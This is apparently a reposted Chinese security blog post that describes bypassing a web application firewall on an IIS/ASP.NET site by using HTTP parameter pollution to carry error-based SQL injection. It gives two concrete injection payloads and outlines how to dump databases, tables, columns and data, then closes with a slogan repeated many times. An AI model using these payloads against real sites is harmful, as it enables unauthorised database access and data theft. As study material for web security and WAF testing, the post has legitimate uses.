实操:一次简单的HPP绕WAF

  • A+
所属分类:安全文章


实操:一次简单的HPP绕WAF


        一次简单的HPP绕WAF


        利用代码中的一段错误,导致我们可以利用hpp来完全绕过防御规则。
        WAF绕过中,对规则与正则的绕过总是有局限性的。


直接操作

单引号报错:


实操:一次简单的HPP绕WAF


                           

闭合一波:


实操:一次简单的HPP绕WAF



直接被干掉……

仔细看了下第一包的响应:asp.net,基本锁定IIS+ASP.NET,此时hpp不香吗


实操:一次简单的HPP绕WAF


结合报错回显,直接构造payload

vin=11111111111111')&vin=and+1=db_name()--+-


实操:一次简单的HPP绕WAF


参数连接时用了逗号,将payload简单修改下:

vin=11111111111111&vin=')+and+1=db_name()--+-


实操:一次简单的HPP绕WAF


也可以直接用注释符包含:


实操:一次简单的HPP绕WAF



依次注出其它库:


实操:一次简单的HPP绕WAF



注表,通过not in语句:


实操:一次简单的HPP绕WAF



利用having 1=1group by注字段:


实操:一次简单的HPP绕WAF

实操:一次简单的HPP绕WAF




注数据:


 

实操:一次简单的HPP绕WAF



        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。

        学好技术,别再让WAF拦住你脚步。


本文始发于微信公众号(Khan安全攻防实验室):实操:一次简单的HPP绕WAF

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: